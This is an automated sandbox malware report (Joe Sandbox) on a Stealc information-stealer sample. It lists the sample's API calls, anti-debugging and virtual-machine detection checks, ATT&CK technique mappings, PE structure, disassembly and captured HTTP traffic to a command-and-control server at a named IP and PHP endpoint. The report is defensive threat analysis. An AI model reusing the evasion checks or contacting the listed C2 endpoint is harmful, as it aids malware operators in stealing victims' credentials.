                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00F3E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00F447C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F3F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F31710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00F3DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F44B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00F43B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00F3BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00F3EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F3DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F31160 GetSystemInfo,ExitProcess,0_2_00F31160
                Source: file.exe, file.exe, 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2113114519.00000000009F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.00000000009FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareV9
                Source: file.exe, 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37855
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37858
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37868
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37877
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37909
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37743
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F34610 VirtualProtect ?,00000004,00000100,000000000_2_00F34610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F49BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F49AA0 mov eax, dword ptr fs:[00000030h]0_2_00F49AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F47690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00F47690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3628, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00F49790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F498E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00F498E0
                Source: file.exe, file.exe, 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F775A8 cpuid 0_2_00F775A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00F47D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F46BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00F46BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F479E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00F479E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F47BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00F47BC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.file.exe.f30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2062832423.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3628, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.file.exe.f30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2062832423.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3628, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                33
                Virtualization/Sandbox Evasion
                LSASS Memory641
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools
                Security Account Manager33
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS13
                Process Discovery
                Distributed Component Object ModelInput Capture12
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Account Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc Filesystem334
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe43%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                http://185.215.113.206/6c4adf523b719729.php/18%VirustotalBrowse
                http://185.215.113.206/19%VirustotalBrowse
                http://185.215.113.20619%VirustotalBrowse
                http://185.215.113.206/6c4adf523b719729.php17%VirustotalBrowse
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrueunknown
                http://185.215.113.206/trueunknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.206kfile.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://185.215.113.206file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.206/6c4adf523b719729.phpzfile.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://185.215.113.206/jfile.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://185.215.113.206/6c4adf523b719729.php6file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://185.215.113.206/6c4adf523b719729.phpvfile.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.206
                          unknownPortugal
                          206894WHOLESALECONNECTIONSNLtrue
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1545099
                          Start date and time:2024-10-30 05:23:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 3s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:2
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 132
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206
                          No context
                          No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.962398550854708
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:2'145'792 bytes
                          MD5:0d30eb6a4023a6dce770ce3d6388cb9b
                          SHA1:83e8c18d4ad2b7c36d6699e7a9e25a7b552b9779
                          SHA256:7ea542ed634733c045e8d30777ae4f1c9a0a87d532f336158d36887483a6af7c
                          SHA512:a961fae055e2f8e69e8f0e2501b38d03282c522435e51d1a8c484c2997df0c571aae580d8c1d6e0efdf95fcd32686d0badca1a772250efc9e42941ae8eebe66f
                          SSDEEP:24576:XvSuU3nuIQzd/KBskLatstrMZ8TfmRVbV6I3Q1e+fH74mJYI64e5nNUebDks59QD:/SZHQzoBbrtWVoWQ1zVW46msDwD
                          TLSH:22A533343CA5A5A7D58C9732C868B5AF694185C27D1DC0E3759F28227EC0B24C89BBFD
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0xb30000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          jmp 00007FAF1CBAA6CAh
                          setl byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          inc ecx
                          push bx
                          dec esi
                          dec ebp
                          das
                          xor al, 36h
                          dec edi
                          bound ecx, dword ptr [ecx+4Ah]
                          dec edx
                          insd
                          push edi
                          dec eax
                          dec eax
                          jbe 00007FAF1CBAA732h
                          push esi
                          dec edx
                          popad
                          je 00007FAF1CBAA72Bh
                          push edx
                          dec esi
                          jc 00007FAF1CBAA73Ah
                          cmp byte ptr [ebx], dh
                          push edx
                          jns 00007FAF1CBAA707h
                          or eax, 49674B0Ah
                          cmp byte ptr [edi+43h], dl
                          jnc 00007FAF1CBAA70Dh
                          bound eax, dword ptr [ecx+30h]
                          pop edx
                          inc edi
                          push esp
                          push 43473163h
                          aaa
                          push edi
                          dec esi
                          xor ebp, dword ptr [ebx+59h]
                          push edi
                          push edx
                          pop eax
                          je 00007FAF1CBAA717h
                          xor dl, byte ptr [ebx+2Bh]
                          popad
                          jne 00007FAF1CBAA70Ch
                          dec eax
                          dec ebp
                          jo 00007FAF1CBAA703h
                          xor dword ptr [edi], esi
                          inc esp
                          dec edx
                          dec ebp
                          jns 00007FAF1CBAA710h
                          insd
                          jnc 00007FAF1CBAA730h
                          aaa
                          inc esp
                          inc ecx
                          inc ebx
                          xor dl, byte ptr [ecx+4Bh]
                          inc edx
                          inc esp
                          bound esi, dword ptr [ebx]
                          or eax, 63656B0Ah
                          jno 00007FAF1CBAA718h
                          push edx
                          insb
                          js 00007FAF1CBAA731h
                          outsb
                          inc ecx
                          jno 00007FAF1CBAA712h
                          push ebp
                          inc esi
                          pop edx
                          xor eax, dword ptr [ebx+36h]
                          push eax
                          aaa
                          imul edx, dword ptr [ebx+58h], 4Eh
                          aaa
                          inc ebx
                          jbe 00007FAF1CBAA70Ch
                          dec ebx
                          js 00007FAF1CBAA703h
                          jne 00007FAF1CBAA6F1h
                          push esp
                          inc bp
                          outsb
                          inc edx
                          popad
                          dec ebx
                          insd
                          dec ebp
                          inc edi
                          xor dword ptr [ecx+36h], esp
                          push 0000004Bh
                          sub eax, dword ptr [ebp+33h]
                          jp 00007FAF1CBAA71Ch
                          dec edx
                          xor bh, byte ptr [edx+56h]
                          bound eax, dword ptr [edi+66h]
                          jbe 00007FAF1CBAA6FAh
                          dec eax
                          or eax, 506C720Ah
                          aaa
                          xor dword ptr fs:[ebp+62h], ecx
                          arpl word ptr [esi], si
                          inc esp
                          jo 00007FAF1CBAA733h
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x2e70000x67600bbf51362ae54b7d4bc6166938774ce9funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x2ea0000x2a40000x2000cb63f75f24617813c87d6b030963539unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          xpxnzipx0x58e0000x1a10000x1a0c006515edac222ec6fa943caa1ef1e25973False0.9946538036142771data7.952407047426657IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          atgrbfaq0x72f0000x10000x600755f7987030a9d129280ba16cd93e8feFalse0.5859375data5.049118087689733IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x7300000x30000x2200a9cfc5e19dd2e366da597c35bdd01917False0.37293198529411764DOS executable (COM)3.9781735833142866IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          DLLImport
                          kernel32.dlllstrcpy
                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-30T05:24:04.560659+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP
                          TimestampSource PortDest PortSource IPDest IP
                          Oct 30, 2024 05:24:03.306823015 CET4970480192.168.2.5185.215.113.206
                          Oct 30, 2024 05:24:03.312283993 CET8049704185.215.113.206192.168.2.5
                          Oct 30, 2024 05:24:03.312375069 CET4970480192.168.2.5185.215.113.206
                          Oct 30, 2024 05:24:03.312542915 CET4970480192.168.2.5185.215.113.206
                          Oct 30, 2024 05:24:03.317832947 CET8049704185.215.113.206192.168.2.5
                          Oct 30, 2024 05:24:04.264756918 CET8049704185.215.113.206192.168.2.5
                          Oct 30, 2024 05:24:04.264823914 CET4970480192.168.2.5185.215.113.206
                          Oct 30, 2024 05:24:04.268095970 CET4970480192.168.2.5185.215.113.206
                          Oct 30, 2024 05:24:04.273396969 CET8049704185.215.113.206192.168.2.5
                          Oct 30, 2024 05:24:04.560555935 CET8049704185.215.113.206192.168.2.5
                          Oct 30, 2024 05:24:04.560658932 CET4970480192.168.2.5185.215.113.206
                          Oct 30, 2024 05:24:07.567754030 CET4970480192.168.2.5185.215.113.206
                          • 185.215.113.206
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.549704185.215.113.206803628C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          Oct 30, 2024 05:24:03.312542915 CET90OUTGET / HTTP/1.1
                          Host: 185.215.113.206
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Oct 30, 2024 05:24:04.264756918 CET203INHTTP/1.1 200 OK
                          Date: Wed, 30 Oct 2024 04:24:04 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Oct 30, 2024 05:24:04.268095970 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC
                          Host: 185.215.113.206
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
